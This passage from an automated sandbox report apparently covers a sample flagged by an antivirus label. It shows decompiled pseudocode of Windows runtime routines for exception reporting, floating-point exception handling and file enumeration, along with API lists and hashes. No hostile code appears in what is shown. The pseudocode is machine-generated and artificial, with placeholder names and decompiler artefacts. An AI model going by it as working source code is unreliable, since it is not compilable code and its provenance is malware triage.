    					_t8 =  &(_t68[1]); // 0x2
    					if(_t65 == _t8) {
    						goto L8;
    					} else {
    						_push(_t60);
    						_t59 = 0;
    						L7:
    						_t45 = E001B5293(_t60, _t68, _t59, _t59);
    					}
    				}
    				L21:
    				return E001ADB25(_t45, _t59, _v8 ^ _t70, _t65, _t68, _t69);
    			}

























    0x001b5352
    0x001b5359
    0x001b535c
    0x001b535f
    0x001b5365
    0x001b5368
    0x001b5370
    0x001b5372
    0x001b5385
    0x001b538a
    0x00000000
    0x00000000
    0x00000000
    0x001b538a
    0x001b538c
    0x001b538c
    0x001b5392
    0x001b5398
    0x001b53b4
    0x001b53b5
    0x001b53bb
    0x001b53c7
    0x001b53ca
    0x001b53cc
    0x001b53d3
    0x001b53e8
    0x001b53ed
    0x001b53f7
    0x001b5407
    0x001b540d
    0x001b540e
    0x001b5415
    0x001b5434
    0x001b5443
    0x001b5448
    0x001b544b
    0x001b5453
    0x001b54a2
    0x001b54a8
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x001b5455
    0x001b545d
    0x001b5467
    0x001b5467
    0x001b546d
    0x001b5471
    0x001b5477
    0x001b547c
    0x001b5497
    0x001b549c
    0x001b547f
    0x001b5485
    0x001b53ef
    0x001b53ef
    0x00000000
    0x001b53ef
    0x001b539a
    0x001b539a
    0x001b539f
    0x00000000
    0x001b53a1
    0x001b53a1
    0x001b53a2
    0x001b53a4
    0x001b53a7
    0x001b53ac
    0x001b539f
    0x001b54ae
    0x001b54bc

    APIs
    • FindFirstFileExW.KERNEL32(00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 001B53E2
    • FindNextFileW.KERNEL32(00000000,?), ref: 001B545D
    • FindClose.KERNEL32(00000000), ref: 001B547F
    • FindClose.KERNEL32(00000000), ref: 001B54A2
    Memory Dump Source
    • Source File: 00000000.00000002.265490341.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
    • Associated: 00000000.00000002.265486347.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.265503610.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.265511296.00000000001C4000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.265516218.00000000001C9000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_1a0000_SecuriteInfo.jbxd
    Similarity
    • API ID: Find$CloseFile$FirstNext
    • String ID:
    • API String ID: 1164774033-0
    • Opcode ID: b4ff65856aa28103f5cbe20301d7c8ff10b111b88889c0b9f310da28e7705250
    • Instruction ID: f175a213b9580d056562c36d6bcec6bb4da78f75f8a9d9e3756052b094373f22
    • Opcode Fuzzy Hash: b4ff65856aa28103f5cbe20301d7c8ff10b111b88889c0b9f310da28e7705250
    • Instruction Fuzzy Hash: 4941A271901A29AEDB20EFA4DD88BFEB7BAEB85355F144195E405D7150FB309EC08B60
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 85%
    			E001AD72C(intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, intOrPtr _a4) {
    				char _v0;
    				struct _EXCEPTION_POINTERS _v12;
    				intOrPtr _v80;
    				intOrPtr _v88;
    				char _v92;
    				intOrPtr _v608;
    				intOrPtr _v612;
    				void* _v616;
    				intOrPtr _v620;
    				char _v624;
    				intOrPtr _v628;
    				intOrPtr _v632;
    				intOrPtr _v636;
    				intOrPtr _v640;
    				intOrPtr _v644;
    				intOrPtr _v648;
    				intOrPtr _v652;
    				intOrPtr _v656;
    				intOrPtr _v660;
    				intOrPtr _v664;
    				intOrPtr _v668;
    				char _v808;
    				char* _t39;
    				long _t49;
    				intOrPtr _t51;
    				void* _t54;
    				intOrPtr _t55;
    				intOrPtr _t57;
    				intOrPtr _t58;
    				intOrPtr _t59;
    				intOrPtr* _t60;
    
    				_t59 = __esi;
    				_t58 = __edi;
    				_t57 = __edx;
    				if(IsProcessorFeaturePresent(0x17) != 0) {
    					_t55 = _a4;
    					asm("int 0x29");
    				}
    				E001AD6A0(_t34);
    				 *_t60 = 0x2cc;
    				_v632 = E001AFC30(_t58,  &_v808, 0, 3);
    				_v636 = _t55;
    				_v640 = _t57;
    				_v644 = _t51;
    				_v648 = _t59;
    				_v652 = _t58;
    				_v608 = ss;
    				_v620 = cs;
    				_v656 = ds;
    				_v660 = es;
    				_v664 = fs;
    				_v668 = gs;
    				asm("pushfd");
    				_pop( *_t15);
    				_v624 = _v0;
    				_t39 =  &_v0;
    				_v612 = _t39;
    				_v808 = 0x10001;
    				_v628 =  *((intOrPtr*)(_t39 - 4));
    				E001AFC30(_t58,  &_v92, 0, 0x50);
    				_v92 = 0x40000015;
    				_v88 = 1;
    				_v80 = _v0;
    				_t28 = IsDebuggerPresent() - 1; // -1
    				_v12.ExceptionRecord =  &_v92;
    				asm("sbb bl, bl");
    				_v12.ContextRecord =  &_v808;
    				_t54 =  ~_t28 + 1;
    				SetUnhandledExceptionFilter(0);
    				_t49 = UnhandledExceptionFilter( &_v12);
    				if(_t49 == 0 && _t54 == 0) {
    					_push(3);
    					return E001AD6A0(_t49);
    				}
    				return _t49;
    			}


































    0x001ad72c
    0x001ad72c
    0x001ad72c
    0x001ad740
    0x001ad742
    0x001ad745
    0x001ad745
    0x001ad749
    0x001ad74e
    0x001ad766
    0x001ad76c
    0x001ad772
    0x001ad778
    0x001ad77e
    0x001ad784
    0x001ad78a
    0x001ad791
    0x001ad798
    0x001ad79f
    0x001ad7a6
    0x001ad7ad
    0x001ad7b4
    0x001ad7b5
    0x001ad7be
    0x001ad7c4
    0x001ad7c7
    0x001ad7cd
    0x001ad7dc
    0x001ad7e8
    0x001ad7f3
    0x001ad7fa
    0x001ad801
    0x001ad80c
    0x001ad814
    0x001ad81d
    0x001ad81f
    0x001ad822
    0x001ad824
    0x001ad82e
    0x001ad836
    0x001ad83c
    0x00000000
    0x001ad843
    0x001ad846

    APIs
    • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 001AD738
    • IsDebuggerPresent.KERNEL32 ref: 001AD804
    • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 001AD824
    • UnhandledExceptionFilter.KERNEL32(?), ref: 001AD82E
    Memory Dump Source
    • Source File: 00000000.00000002.265490341.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
    • Associated: 00000000.00000002.265486347.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.265503610.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.265511296.00000000001C4000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.265516218.00000000001C9000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_1a0000_SecuriteInfo.jbxd
    Similarity
    • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
    • String ID:
    • API String ID: 254469556-0
    • Opcode ID: 81025e8ef2c9dd2e74b2b93580bd70156085b5eeb8f14b788f6f3a2ec18c33dd
    • Instruction ID: 13f4c8cb7e9f5e45dc510b7eff4c98363020e0c6ab4f71351a870f24a5969fe2
    • Opcode Fuzzy Hash: 81025e8ef2c9dd2e74b2b93580bd70156085b5eeb8f14b788f6f3a2ec18c33dd
    • Instruction Fuzzy Hash: 0F314B79D4121C9BDB10DFA5D949BCCBBB8AF09304F1041AAE40EA7251EB709B85CF45
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 79%
    			E001B37DA(intOrPtr __ebx, intOrPtr __edx, intOrPtr __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
    				char _v0;
    				signed int _v8;
    				intOrPtr _v524;
    				intOrPtr _v528;
    				void* _v532;
    				intOrPtr _v536;
    				char _v540;
    				intOrPtr _v544;
    				intOrPtr _v548;
    				intOrPtr _v552;
    				intOrPtr _v556;
    				intOrPtr _v560;
    				intOrPtr _v564;
    				intOrPtr _v568;
    				intOrPtr _v572;
    				intOrPtr _v576;
    				intOrPtr _v580;
    				intOrPtr _v584;
    				char _v724;
    				intOrPtr _v792;
    				intOrPtr _v800;
    				char _v804;
    				intOrPtr _v808;
    				char _v812;
    				void* __edi;
    				signed int _t40;
    				char* _t47;
    				intOrPtr _t49;
    				intOrPtr _t60;
    				intOrPtr _t61;
    				intOrPtr _t65;
    				intOrPtr _t66;
    				int _t67;
    				intOrPtr _t68;
    				signed int _t69;
    
    				_t68 = __esi;
    				_t65 = __edx;
    				_t60 = __ebx;
    				_t40 =  *0x1c4050; // 0x33da424a
    				_t41 = _t40 ^ _t69;
    				_v8 = _t40 ^ _t69;
    				if(_a4 != 0xffffffff) {
    					_push(_a4);
    					E001AD6A0(_t41);
    					_pop(_t61);
    				}
    				E001AFC30(_t66,  &_v804, 0, 0x50);
    				E001AFC30(_t66,  &_v724, 0, 0x2cc);
    				_v812 =  &_v804;
    				_t47 =  &_v724;
    				_v808 = _t47;
    				_v548 = _t47;
    				_v552 = _t61;
    				_v556 = _t65;
    				_v560 = _t60;
    				_v564 = _t68;
    				_v568 = _t66;
    				_v524 = ss;
    				_v536 = cs;
    				_v572 = ds;
    				_v576 = es;
    				_v580 = fs;
    				_v584 = gs;
    				asm("pushfd");
    				_pop( *_t22);
    				_v540 = _v0;
    				_t25 =  &_v0; // 0x4
    				_t49 = _t25;
    				_v528 = _t49;
    				_v724 = 0x10001;
    				_v544 =  *((intOrPtr*)(_t49 - 4));
    				_v804 = _a8;
    				_v800 = _a12;
    				_v792 = _v0;
    				_t67 = IsDebuggerPresent();
    				SetUnhandledExceptionFilter(0);
    				_t36 =  &_v812; // -808
    				if(UnhandledExceptionFilter(_t36) == 0 && _t67 == 0 && _a4 != 0xffffffff) {
    					_push(_a4);
    					_t57 = E001AD6A0(_t57);
    				}
    				return E001ADB25(_t57, _t60, _v8 ^ _t69, _t65, _t67, _t68);
    			}






































    0x001b37da
    0x001b37da
    0x001b37da
    0x001b37e5
    0x001b37ea
    0x001b37ec
    0x001b37f4
    0x001b37f6
    0x001b37f9
    0x001b37fe
    0x001b37fe
    0x001b380a
    0x001b381d
    0x001b382b
    0x001b3831
    0x001b3837
    0x001b383d
    0x001b3843
    0x001b3849
    0x001b384f
    0x001b3855
    0x001b385b
    0x001b3861
    0x001b3868
    0x001b386f
    0x001b3876
    0x001b387d
    0x001b3884
    0x001b388b
    0x001b388c
    0x001b3895
    0x001b389b
    0x001b389b
    0x001b389e
    0x001b38a4
    0x001b38b1
    0x001b38ba
    0x001b38c3
    0x001b38cc
    0x001b38da
    0x001b38dc
    0x001b38e2
    0x001b38f1
    0x001b38fd
    0x001b3900
    0x001b3905
    0x001b3912

    APIs
    • IsDebuggerPresent.KERNEL32(?,?,?,?,?,?), ref: 001B38D2
    • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,?), ref: 001B38DC
    • UnhandledExceptionFilter.KERNEL32(-00000328,?,?,?,?,?,?), ref: 001B38E9
    Memory Dump Source
    • Source File: 00000000.00000002.265490341.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
    • Associated: 00000000.00000002.265486347.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.265503610.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.265511296.00000000001C4000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.265516218.00000000001C9000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_1a0000_SecuriteInfo.jbxd
    Similarity
    • API ID: ExceptionFilterUnhandled$DebuggerPresent
    • String ID:
    • API String ID: 3906539128-0
    • Opcode ID: d711610cdacf88c6f7dc8e336584b079830f0fe6d76d58c267b8632e84c4b949
    • Instruction ID: ff4f4bf6eb1e3f12f5ca2711bc96063350614a8301f77a4cd8540aa25ce58739
    • Opcode Fuzzy Hash: d711610cdacf88c6f7dc8e336584b079830f0fe6d76d58c267b8632e84c4b949
    • Instruction Fuzzy Hash: CC31D27594122CABCB21DF64D889BCCBBB8FF18310F5041EAE41DA6251EB709B818F44
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E001BA9AA(long _a4, signed int* _a8, signed char _a12, signed int _a16, intOrPtr* _a20, unsigned int* _a24, intOrPtr _a28) {
    				signed int _t172;
    				signed int _t175;
    				signed int _t178;
    				signed int* _t179;
    				signed char _t193;
    				signed int _t196;
    				signed int _t200;
    				signed int _t203;
    				void* _t204;
    				void* _t207;
    				signed int _t210;
    				void* _t211;
    				signed int _t226;
    				unsigned int* _t241;
    				signed char _t243;
    				signed int* _t251;
    				unsigned int* _t257;
    				signed int* _t258;
    				signed char _t260;
    				long _t263;
    				signed int* _t266;
    
    				 *(_a4 + 4) = 0;
    				_t263 = 0xc000000d;
    				 *(_a4 + 8) = 0;
    				 *(_a4 + 0xc) = 0;
    				_t243 = _a12;
    				if((_t243 & 0x00000010) != 0) {
    					_t263 = 0xc000008f;
    					 *(_a4 + 4) =  *(_a4 + 4) | 1;
    				}
    				if((_t243 & 0x00000002) != 0) {
    					_t263 = 0xc0000093;
    					 *(_a4 + 4) =  *(_a4 + 4) | 0x00000002;
    				}
    				if((_t243 & 0x00000001) != 0) {
    					_t263 = 0xc0000091;
    					 *(_a4 + 4) =  *(_a4 + 4) | 0x00000004;
    				}
    				if((_t243 & 0x00000004) != 0) {
    					_t263 = 0xc000008e;
    					 *(_a4 + 4) =  *(_a4 + 4) | 0x00000008;
    				}
    				if((_t243 & 0x00000008) != 0) {
    					_t263 = 0xc0000090;
    					 *(_a4 + 4) =  *(_a4 + 4) | 0x00000010;
    				}
    				_t266 = _a8;
    				 *(_a4 + 8) =  *(_a4 + 8) ^ ( !( *_t266 << 4) ^  *(_a4 + 8)) & 0x00000010;
    				 *(_a4 + 8) =  *(_a4 + 8) ^ ( !( *_t266 +  *_t266) ^  *(_a4 + 8)) & 0x00000008;
    				 *(_a4 + 8) =  *(_a4 + 8) ^ ( !( *_t266 >> 1) ^  *(_a4 + 8)) & 0x00000004;
    				 *(_a4 + 8) =  *(_a4 + 8) ^ ( !( *_t266 >> 3) ^  *(_a4 + 8)) & 0x00000002;
    				 *(_a4 + 8) =  *(_a4 + 8) ^ ( !( *_t266 >> 5) ^  *(_a4 + 8)) & 1;
    				_t260 = E001B861B(_a4);
    				if((_t260 & 0x00000001) != 0) {
    					 *(_a4 + 0xc) =  *(_a4 + 0xc) | 0x00000010;
    				}
    				if((_t260 & 0x00000004) != 0) {
    					 *(_a4 + 0xc) =  *(_a4 + 0xc) | 0x00000008;
    				}
    				if((_t260 & 0x00000008) != 0) {
    					 *(_a4 + 0xc) =  *(_a4 + 0xc) | 0x00000004;
    				}
    				if((_t260 & 0x00000010) != 0) {
    					 *(_a4 + 0xc) =  *(_a4 + 0xc) | 0x00000002;
    				}
    				if((_t260 & 0x00000020) != 0) {
    					 *(_a4 + 0xc) =  *(_a4 + 0xc) | 1;
    				}
    				_t172 =  *_t266 & 0x00000c00;
    				if(_t172 == 0) {
    					 *_a4 =  *_a4 & 0xfffffffc;
    				} else {
    					if(_t172 == 0x400) {
    						_t258 = _a4;
    						_t226 =  *_t258 & 0xfffffffd | 1;
    						L26:
    						 *_t258 = _t226;
    						L29:
    						_t175 =  *_t266 & 0x00000300;
    						if(_t175 == 0) {
    							_t251 = _a4;
    							_t178 =  *_t251 & 0xffffffeb | 0x00000008;
    							L35:
    							 *_t251 = _t178;
    							L36:
    							_t179 = _a4;
    							_t255 = (_a16 << 0x00000005 ^  *_t179) & 0x0001ffe0;
    							 *_t179 =  *_t179 ^ (_a16 << 0x00000005 ^  *_t179) & 0x0001ffe0;
    							 *(_a4 + 0x20) =  *(_a4 + 0x20) | 1;
    							if(_a28 == 0) {
    								 *(_a4 + 0x20) =  *(_a4 + 0x20) & 0xffffffe3 | 0x00000002;
    								 *((long long*)(_a4 + 0x10)) =  *_a20;
    								 *(_a4 + 0x60) =  *(_a4 + 0x60) | 1;
    								_t255 = _a4;
    								_t241 = _a24;
    								 *(_a4 + 0x60) =  *(_a4 + 0x60) & 0xffffffe3 | 0x00000002;
    								 *(_a4 + 0x50) =  *_t241;
    							} else {
    								 *(_a4 + 0x20) =  *(_a4 + 0x20) & 0xffffffe1;
    								 *((intOrPtr*)(_a4 + 0x10)) =  *_a20;
    								 *(_a4 + 0x60) =  *(_a4 + 0x60) | 1;
    								_t241 = _a24;
    								 *(_a4 + 0x60) =  *(_a4 + 0x60) & 0xffffffe1;
    								 *(_a4 + 0x50) =  *_t241;
    							}
    							E001B85E0(_t255);
    							RaiseException(_t263, 0, 1,  &_a4);
    							_t257 = _a4;
    							_t193 = _t257[2];
    							if((_t193 & 0x00000010) != 0) {
    								 *_t266 =  *_t266 & 0xfffffffe;
    								_t193 = _t257[2];
    							}
    							if((_t193 & 0x00000008) != 0) {
    								 *_t266 =  *_t266 & 0xfffffffb;
    								_t193 = _t257[2];
    							}
    							if((_t193 & 0x00000004) != 0) {
    								 *_t266 =  *_t266 & 0xfffffff7;
    								_t193 = _t257[2];
    							}
    							if((_t193 & 0x00000002) != 0) {
    								 *_t266 =  *_t266 & 0xffffffef;
    								_t193 = _t257[2];
    							}
    							if((_t193 & 0x00000001) != 0) {
    								 *_t266 =  *_t266 & 0xffffffdf;
    							}
    							_t196 =  *_t257 & 0x00000003;
    							if(_t196 == 0) {
    								 *_t266 =  *_t266 & 0xfffff3ff;
    							} else {
    								_t207 = _t196 - 1;
    								if(_t207 == 0) {
    									_t210 =  *_t266 & 0xfffff7ff | 0x00000400;
    									L55:
    									 *_t266 = _t210;
    									L58:
    									_t200 =  *_t257 >> 0x00000002 & 0x00000007;
    									if(_t200 == 0) {
    										_t203 =  *_t266 & 0xfffff3ff | 0x00000300;
    										L64:
    										 *_t266 = _t203;
    										L65:
    										if(_a28 == 0) {
    											 *_t241 = _t257[0x14];
    										} else {
    											 *_t241 = _t257[0x14];
    										}
    										return _t203;
    									}
    									_t204 = _t200 - 1;
    									if(_t204 == 0) {
    										_t203 =  *_t266 & 0xfffff3ff | 0x00000200;
    										goto L64;
    									}
    									_t203 = _t204 - 1;
    									if(_t203 == 0) {
    										 *_t266 =  *_t266 & 0xfffff3ff;
    									}
    									goto L65;
    								}
    								_t211 = _t207 - 1;
    								if(_t211 == 0) {
    									_t210 =  *_t266 & 0xfffffbff | 0x00000800;
    									goto L55;
    								}
    								if(_t211 == 1) {
    									 *_t266 =  *_t266 | 0x00000c00;
    								}
    							}
    							goto L58;
    						}
    						if(_t175 == 0x200) {
    							_t251 = _a4;
    							_t178 =  *_t251 & 0xffffffe7 | 0x00000004;
    							goto L35;
    						}
    						if(_t175 == 0x300) {
    							 *_a4 =  *_a4 & 0xffffffe3;
    						}
    						goto L36;
    					}
    					if(_t172 == 0x800) {
    						_t258 = _a4;
    						_t226 =  *_t258 & 0xfffffffe | 0x00000002;
    						goto L26;
    					}
    					if(_t172 == 0xc00) {
    						 *_a4 =  *_a4 | 0x00000003;
    					}
    				}
    			}
























    0x001ba9b8
    0x001ba9bf
    0x001ba9c4
    0x001ba9ca
    0x001ba9cd
    0x001ba9d3
    0x001ba9d8
    0x001ba9dd
    0x001ba9dd
    0x001ba9e3
    0x001ba9e8
    0x001ba9ed
    0x001ba9ed
    0x001ba9f4
    0x001ba9f9
    0x001ba9fe
    0x001ba9fe
    0x001baa05
    0x001baa0a
    0x001baa0f
    0x001baa0f
    0x001baa16
    0x001baa1b
    0x001baa20
    0x001baa20
    0x001baa28
    0x001baa38
    0x001baa4a
    0x001baa5c
    0x001baa6f
    0x001baa81
    0x001baa89
    0x001baa8e
    0x001baa93
    0x001baa93
    0x001baa9a
    0x001baa9f
    0x001baa9f
    0x001baaa6
    0x001baaab
    0x001baaab
    0x001baab2
    0x001baab7
    0x001baab7
    0x001baabe
    0x001baac3
    0x001baac3
    0x001baacd
    0x001baacf
    0x001bab09
    0x001baad1
    0x001baad6
    0x001baafa
    0x001bab02
    0x001baaf6
    0x001baaf6
    0x001bab0c
    0x001bab13
    0x001bab15
    0x001bab37
    0x001bab3f
    0x001bab42
    0x001bab42
    0x001bab44
    0x001bab44
    0x001bab4f
    0x001bab55
    0x001bab5a
    0x001bab61
    0x001bab9b
    0x001baba6
    0x001babac
    0x001babaf
    0x001babb2
    0x001babbe
    0x001babc6
    0x001bab63
    0x001bab66
    0x001bab72
    0x001bab78
    0x001bab7e
    0x001bab81
    0x001bab8a
    0x001bab8a
    0x001babc9
    0x001babd7
    0x001babdd
    0x001babe0
    0x001babe5
    0x001babe7
    0x001babea
    0x001babea
    0x001babef
    0x001babf1
    0x001babf4
    0x001babf4
    0x001babf9
    0x001babfb
    0x001babfe
    0x001babfe
    0x001bac03
    0x001bac05
    0x001bac08
    0x001bac08
    0x001bac0d
    0x001bac0f
    0x001bac0f
    0x001bac1c
    0x001bac1f
    0x001bac56
    0x001bac21
    0x001bac21
    0x001bac24
    0x001bac4f
    0x001bac44
    0x001bac44
    0x001bac58
    0x001bac60
    0x001bac63
    0x001bac82
    0x001bac87
    0x001bac87
    0x001bac89
    0x001bac8e
    0x001bac9a
    0x001bac90
    0x001bac93
    0x001bac93
    0x001bac9f
    0x001bac9f
    0x001bac65
    0x001bac68
    0x001bac77
    0x00000000
    0x001bac77
    0x001bac6a
    0x001bac6d
    0x001bac6f
    0x001bac6f
    0x00000000
    0x001bac6d
    0x001bac26
    0x001bac29
    0x001bac3f
    0x00000000
    0x001bac3f
    0x001bac2e
    0x001bac30
    0x001bac30
    0x001bac2e
    0x00000000
    0x001bac1f
    0x001bab1c
    0x001bab2a
    0x001bab32
    0x00000000
    0x001bab32
    0x001bab20
    0x001bab25
    0x001bab25
    0x00000000
    0x001bab20
    0x001baadd
    0x001baaeb
    0x001baaf3
    0x00000000
    0x001baaf3
    0x001baae1
    0x001baae6
    0x001baae6
    0x001baae1

    APIs
    • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,001BA905,?,?,00000008,?,?,001BA4E0,00000000), ref: 001BABD7
    Memory Dump Source
    • Source File: 00000000.00000002.265490341.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
    • Associated: 00000000.00000002.265486347.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.265503610.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.265511296.00000000001C4000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.265516218.00000000001C9000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_1a0000_SecuriteInfo.jbxd
    Similarity
    • API ID: ExceptionRaise
    • String ID:
    • API String ID: 3997070919-0
    • Opcode ID: 937e3de46afbe7c802c0e6f001d03067f91b5f16e88716f4309c27051adddfc1
    • Instruction ID: 482e470778e73fa416934c3adce0729de52e7ba1997c4f9be5eb4874895f8790
    • Opcode Fuzzy Hash: 937e3de46afbe7c802c0e6f001d03067f91b5f16e88716f4309c27051adddfc1
    • Instruction Fuzzy Hash: 85B17C31210608CFD719CF28C586BA47BE1FF45364F698658E8DACF2A1C335E991CB41
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 71%
    			E001B5293(void* __ecx, intOrPtr* _a4, intOrPtr _a8, signed int _a12, intOrPtr _a16) {
    				intOrPtr _v8;
    				signed int _v12;
    				char* _v28;
    				signed int _v32;
    				WCHAR* _v36;
    				signed int _v48;
    				short _v556;
    				short _v558;
    				struct _WIN32_FIND_DATAW _v604;
    				char _v605;
    				signed int _v612;
    				signed int _v616;
    				intOrPtr _v620;
    				char* _v648;
    				void* __ebx;
    				void* __edi;
    				void* __esi;
    				intOrPtr _t44;
    				void* _t49;
    				signed int _t52;
    				signed char _t54;
    				void* _t63;
    				intOrPtr _t65;
    				intOrPtr _t67;
    				int _t70;
    				void* _t84;
    				void* _t86;
    				void* _t90;
    				union _FINDEX_INFO_LEVELS _t91;
    				signed int* _t92;
    				void* _t93;
    				void* _t94;
    				intOrPtr* _t97;
    				intOrPtr _t100;
    				void* _t102;
    				char* _t103;
    				void* _t111;
    				signed int _t116;
    				WCHAR* _t117;
    				void* _t118;
    				intOrPtr _t119;
    				void* _t121;
    				void* _t122;
    				void* _t124;
    				void* _t125;
    				void* _t129;
    				signed int _t130;
    				void* _t131;
    
    				_push(__ecx);
    				_t97 = _a4;
    				_t111 = _t97 + 2;
    				do {
    					_t44 =  *_t97;
    					_t97 = _t97 + 2;
    				} while (_t44 != 0);
    				_t116 = _a12;
    				_t100 = (_t97 - _t111 >> 1) + 1;
    				_v8 = _t100;
    				if(_t100 <=  !_t116) {
    					_t90 = _t116 + 1 + _t100;
    					_t122 = E001B4871(_t90, 2);
    					_t102 = _t121;
    					if(_t116 == 0) {
    						L7:
    						_push(_v8);
    						_t90 = _t90 - _t116;
    						_t49 = E001B4980(_t102, _t122 + _t116 * 2, _t90, _a4);
    						_t130 = _t129 + 0x10;
    						if(_t49 != 0) {
    							goto L12;
    						} else {
    							_t119 = _a16;
    							_t94 = E001B520C(_t119);
    							if(_t94 == 0) {
    								 *((intOrPtr*)( *((intOrPtr*)(_t119 + 4)))) = _t122;
    								 *((intOrPtr*)(_t119 + 4)) =  *((intOrPtr*)(_t119 + 4)) + 4;
    								_t94 = 0;
    							} else {
    								E001B36C3(_t122);
    							}
    							E001B36C3(0);
    							_t84 = _t94;
    							goto L4;
    						}
    					} else {
    						_push(_t116);
    						_t86 = E001B4980(_t102, _t122, _t90, _a8);
    						_t130 = _t129 + 0x10;
    						if(_t86 != 0) {
    							L12:
    							_push(0);
    							_push(0);
    							_push(0);
    							_push(0);
    							_push(0);
    							E001B37A6();
    							asm("int3");
    							_t128 = _t130;
    							_t131 = _t130 - 0x264;
    							_t52 =  *0x1c4050; // 0x33da424a
    							_v48 = _t52 ^ _t130;
    							_t112 = _v32;
    							_t103 = _v28;
    							_push(_t90);
    							_push(_t122);
    							_push(_t116);
    							_t117 = _v36;
    							_v648 = _t103;
    							if(_t112 != _t117) {
    								while(E001B54BD( *_t112 & 0x0000ffff) == 0) {
    									_t112 = _t112 - 2;
    									if(_t112 != _t117) {
    										continue;
    									}
    									break;
    								}
    								_t103 = _v612;
    							}
    							_t123 =  *_t112 & 0x0000ffff;
    							if(( *_t112 & 0x0000ffff) != 0x3a) {
    								L21:
    								_t103 =  &_v605;
    								_t54 = E001B54BD(_t123);
    								_t112 = (_t112 - _t117 >> 1) + 1;
    								asm("sbb eax, eax");
    								_t91 = 0;
    								_v616 =  ~(_t54 & 0x000000ff) & _t112;
    								_t124 = FindFirstFileExW(_t117, 0,  &_v604, 0, 0, 0);
    								if(_t124 != 0xffffffff) {
    									_t92 = _v612;
    									_v612 = _t92[1] -  *_t92 >> 2;
    									_t63 = 0x2e;
    									do {
    										if(_v604.cFileName != _t63 || _v558 != 0 && (_v558 != _t63 || _v556 != 0)) {
    											_push(_t92);
    											_t65 = E001B5293(_t103,  &(_v604.cFileName), _t117, _v616);
    											_t131 = _t131 + 0x10;
    											_v620 = _t65;
    											if(_t65 != 0) {
    												FindClose(_t124);
    												_t67 = _v620;
    											} else {
    												goto L29;
    											}
    										} else {
    											goto L29;
    										}
    										goto L34;
    										L29:
    										_t70 = FindNextFileW(_t124,  &_v604);
    										_t63 = 0x2e;
    									} while (_t70 != 0);
    									_t112 =  *_t92;
    									_t106 = _v612;
    									_t73 = _t92[1] -  *_t92 >> 2;
    									if(_v612 != _t92[1] -  *_t92 >> 2) {
    										E001B80B0(_t112, _t112 + _t106 * 4, _t73 - _t106, 4, E001B54E1);
    									}
    									FindClose(_t124);
    									_t67 = 0;
    								} else {
    									_push(_v612);
    									goto L20;
    								}
    							} else {
    								_t22 =  &(_t117[1]); // 0x2
    								if(_t112 == _t22) {
    									goto L21;
    								} else {
    									_push(_t103);
    									_t91 = 0;
    									L20:
    									_t67 = E001B5293(_t103, _t117, _t91, _t91);
    								}
    							}
    							L34:
    							_pop(_t118);
    							_pop(_t125);
    							_pop(_t93);
    							return E001ADB25(_t67, _t93, _v12 ^ _t128, _t112, _t118, _t125);
    						} else {
    							goto L7;
    						}
    					}
    				} else {
    					_t84 = 0xc;
    					L4:
    					return _t84;
    				}
    			}



















































    0x001b5298
    0x001b5299
    0x001b52a0
    0x001b52a3
    0x001b52a3
    0x001b52a6
    0x001b52a9
    0x001b52ae
    0x001b52b7
    0x001b52ba
    0x001b52bf
    0x001b52cc
    0x001b52d6
    0x001b52d9
    0x001b52dc
    0x001b52f0
    0x001b52f0
    0x001b52f3
    0x001b52fd
    0x001b5302
    0x001b5307
    0x00000000
    0x001b5309
    0x001b5309
    0x001b5313
    0x001b5317
    0x001b5325
    0x001b5327
    0x001b532b
    0x001b5319
    0x001b531a
    0x001b531f
    0x001b532f
    0x001b5335
    0x00000000
    0x001b5337
    0x001b52de
    0x001b52de
    0x001b52e4
    0x001b52e9
    0x001b52ee
    0x001b533a
    0x001b533c
    0x001b533d
    0x001b533e
    0x001b533f
    0x001b5340
    0x001b5341
    0x001b5346
    0x001b534a
    0x001b534c
    0x001b5352
    0x001b5359
    0x001b535c
    0x001b535f
    0x001b5362
    0x001b5363
    0x001b5364
    0x001b5365
    0x001b5368
    0x001b5370
    0x001b5372
    0x001b5385
    0x001b538a
